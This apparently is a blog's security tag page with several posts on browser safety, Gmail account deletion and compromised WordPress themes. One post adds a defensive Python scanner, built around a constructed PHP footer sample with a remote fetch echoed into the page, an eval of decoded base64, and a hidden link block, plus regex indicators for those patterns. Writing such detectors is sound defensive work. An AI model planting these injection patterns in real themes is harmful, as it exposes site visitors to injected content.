security
For once, I'm wishing more sites were like PayPal



I'm not a fan of PayPal, with its poor customer service (which is a huge deal when it comes to handling money), but I'm with them on this:
Web payment firm Paypal has said it will block "unsafe browsers" from using its service as part of wider anti-phishing efforts....
...Paypal said it was "an alarming fact that there is a significant set of users who use very old and vulnerable browsers such as Internet Explorer 4"....
...Paypal said some users were still using Internet Explorer 3, released more than 10 years ago.
IE3?? Holy cow! I don't even think that's loaded on my old IBM Intellistation that's collecting dust in the corner.
Here's a surprise to me:
Paypal said it supported the use of Extended Validation SSL Certificates....
...The latest version of Internet Explorer supports EV SSL certificates, while Firefox 2 supports it with an add-on but Apple's Safari browser for Mac and PCs does not.
(Emphasis added.)
A cautionary tale regarding theme download sites
Via GigaOM:
Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....
...There are lots of reasons a hacker may want to inject code into a page:
- To infect visitors by exploiting a browser vulnerability
- To place ads they can then get revenue from
- To embed links to blogs they own, improving their page rank
- To entice people to click on links that lead them elsewhere
The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.
It's all too easy to compromise a website's security via the theming layer. Malice is just one possibility. There are also hacks and vulnerable code gimmicks pursued by amateur theme developers who just don't know better. It's not just a WordPress thing -- it's all websites, whether built on open source or proprietary platforms (though not static HTML sites, which presumably are as safe as their servers).
In this context, the question for the website owner is whether you want to buy a theme (or download a free one) from an un-vetted vendor. Sure, if you are an adept coder, and/or know the proper API calls to protect your site from things like XSS, you can just clean that up and enjoy the design that attracted you in the first place. But if you don't know those vulnerabilities, you could be opening your site up to ill-will or novice mistakes. Caveat emptor. Don't end up like Deep Jive. Ouch.
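As an added example (not code from the GigaOM post, from WordPress, or from any theme vendor), here is a small scanner that flags the patterns described above in theme source: remote content fetched into the page on every load, decoded-and-evaluated strings, and hidden blocks carrying links. The sample footer, the indicator list, and the function name are my own constructions.

```python
import re

# Constructed sample of a theme footer (not taken from any real theme). It
# contains the three things the post describes: a remote fetch whose result
# is echoed on every page load, an eval of a decoded string, and a hidden
# div that would carry injected links.
SAMPLE_FOOTER_PHP = r"""
<div id="footer">
  <?php wp_footer(); ?>
  <?php echo @file_get_contents('http://example.invalid/payload.txt'); ?>
  <?php eval(base64_decode('ZWNobyAiaGkiOw==')); ?>
  <div style="display:none"><a href="http://example.invalid/">seo</a></div>
</div>
"""

# Heuristic indicators (name, compiled regex). A hit is a reason to read the
# surrounding code, not proof of compromise.
INDICATORS = [
    ("eval of decoded string",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\b", re.I)),
    ("remote content fetched into page",
     re.compile(r"\b(file_get_contents|curl_init|fopen|wp_remote_get)\s*\(\s*['\"]?https?://", re.I)),
    ("hidden block carrying links",
     re.compile(r"display\s*:\s*none[^>]*>\s*<a\b", re.I)),
]


def scan_theme_source(source):
    """Return a list of (line_number, indicator_name, stripped_line) for every hit."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


if __name__ == "__main__":
    for lineno, name, text in scan_theme_source(SAMPLE_FOOTER_PHP):
        print(f"line {lineno}: {name}: {text}")
```

Run it over each file in a downloaded theme before activating it; a clean theme that only calls local WordPress functions produces no findings.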
Fear of the white hat



Via MacWorld:
“This is not good; this is a security risk,” he said. “We’re a bank.”
Wilson said it has taken him the better part of a week to remove Safari from his network and prevent it from being reinstalled.
In an e-mail interview, Susan Bradley agreed that the updates are creating a problem for administrators and making users less secure. “It impacts all of us when more potential attack surface is installed in a group of folks that are vulnerable enough as it is,” said Bradley, who is chief technology officer with Tamiyasu, Smith, Horn and Braun, Accountancy Corp.
Of course I don't have any stats, but I wonder how many of these IT folks are the same ones keeping IE6 alive.
Another case of the inherent vulnerability of centralized apps
In short:
You don't own it = you don't control it.
If your stuff is on someone else's turf, you have to realize that you are at an inherent disadvantage when conflict arises. They say possession is 9/10ths of the law. That is as true on the internet as it is in the "real world."
Consider Bob, who discovered that Google went and deleted his entire GMail account without warning.
...By then I sensed that something was terribly wrong, as the Google folks rarely took > 12 hours to fix such a problem. I accessed the Google Accounts page (www.google.com/accounts/), and saw the following message:
The account you attempted to access has been deleted. You may click here to sign up for a new account.
A nightmare come true?! I tried logging into my Google Account via www.google.com/accounts/Login but was presented with an invalid username/password error.
I tried to reset my password, and my suspicions were confirmed when I saw the following:
There are no accounts in our system with the E-mail address usermame@gmail.com which you entered.
When he got Google to investigate, their response was rather underwhelming:
Hello,
Thank you for your report.
We have investigated this issue, but because the results were inconclusive, we're not able to provide further assistance.
Gmail takes the privacy and security of our users very seriously. For this reason, we can't reveal any further information about this account.
We apologize for any inconvenience this may have caused, and thank you for your cooperation.
Sincerely,
The Google Team
On a carryover thread, Jim asks:
This is a weird suggestion, but... have you tried going through consumer advocates, such as Consumer Reports, the BBB or even better one of those "Channel 7 On Your Side!" news features where the news reporter will help investigate the problem and hopefully get the issue resolved?
Often big companies won't listen to one person, unless that one person has a major news organization backing him up ready to write a story about it.
And there's the rub. How much clout does one person have against a megacorporation?
In the same thread, several people point out that GMail is free, and therefore Bob has no cause to complain. I disagree. For one thing, GMail isn't free: the user has to give up a degree of privacy to allow Google to place targeted ads into their email. Second, free services offered to the public should be at the very least reliable. It's not like GMail is open source, supported by volunteers. If you're saying, "Here's something to replace your other thing," and then it doesn't perform to minimal requirements (such as no arbitrary deletions of all material), well, there's a problem.
To be sure, any system can fail. But it's something else when the problem is a conflict of intention.
Hat tip: Hawk Wings, my favorite source of Apple Mail tips, who points to an essential part of the Google terms of service:
We may modify or terminate our services from time to time, for any reason, and without notice, including the right to terminate with or without notice, without liability to you, any other user or any third party. We reserve the right to modify these Terms of Service from time to time without notice…
…Google disclaims any and all responsibility or liability for the accuracy, content, completeness, legality, reliability, or operability or availability of information or material displayed in the GOOGLE SERVICES results. Google disclaims any responsibility for the deletion, failure to store, misdelivery, or untimely delivery of any information or material.
That's "Do no evil" in legalese.
1.5 reasons to try Firefox
If you haven't been running one of the release candidates already, you may want to get the latest and perhaps best browser to date, Firefox 1.5, now that it's been officially released. And really, if you're using another browser -- especially the buggy and unsafe Internet Explorer -- you owe it to yourself to at least try Firefox, which is safer for your machine.
That's reason one.
As a designer, I find Firefox a pleasurable development in the online world. I can't speak for others, but I think websites look better in Firefox. Meanwhile, Internet Explorer, thanks to Microsoft's defiance of web standards, continues to be a nightmare for web designers who waste hours upon hours hacking around the Internet Explorer quirks in CSS so that IE doesn't break the website altogether.
That's the other half of a reason. Actually, it's another full reason, in my book, but how can aesthetics trump security? So as a computer person, I urge you to switch to Firefox browser as a step towards increased security. As a designer, I beg you, please, help make IE just fade away. Please!